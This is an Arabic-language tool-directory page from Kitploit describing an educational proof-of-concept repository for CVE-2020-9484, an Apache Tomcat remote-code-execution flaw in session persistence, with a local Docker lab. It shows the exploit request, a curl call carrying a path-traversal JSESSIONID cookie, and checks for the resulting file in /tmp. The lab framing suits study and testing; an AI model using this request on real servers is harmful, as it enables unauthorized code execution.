Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-9484 — استغلال إثبات المفهوم التعليمي لـ CVE-2020-9484 (Apache Tomcat RCE عبر استمرار الجلسة). يتضمن مختبرًا قائمًا على Docker لاختبار ثغرة إلغاء التسلسل. | Kitploit
أدوات/GitHubGitHub/masahiro331/cve-2020-9484
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubmasahiro331/cve-2020-9484

CVE-2020-9484

استغلال إثبات المفهوم التعليمي لـ CVE-2020-9484 (Apache Tomcat RCE عبر استمرار الجلسة). يتضمن مختبرًا قائمًا على Docker لاختبار ثغرة إلغاء التسلسل.

عرض المستودع
126275منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-9484 (Tomcat)

لأغراض تعليمية فقط.

انظر المرجع للتفاصيل.

التشغيل

$ git clone https://github.com/masahiro331/CVE-2020-9484.git
$ cd CVE-2020-9484
$ docker build -t tomcat:groovy .
$ CONTAINER=`docker run -d -p 8080:8080 tomcat:groovy`

التحقق (نظيف)

$ docker exec -it $CONTAINER ls -la /tmp

ملاحظة: (rce غير موجود في المخرجات)

الاستغلال

$ curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy'

التحقق (تم الاستغلال)

$ docker exec -it $CONTAINER ls -la /tmp

ملاحظة: (rce موجود في المخرجات)

تنزيل الأداة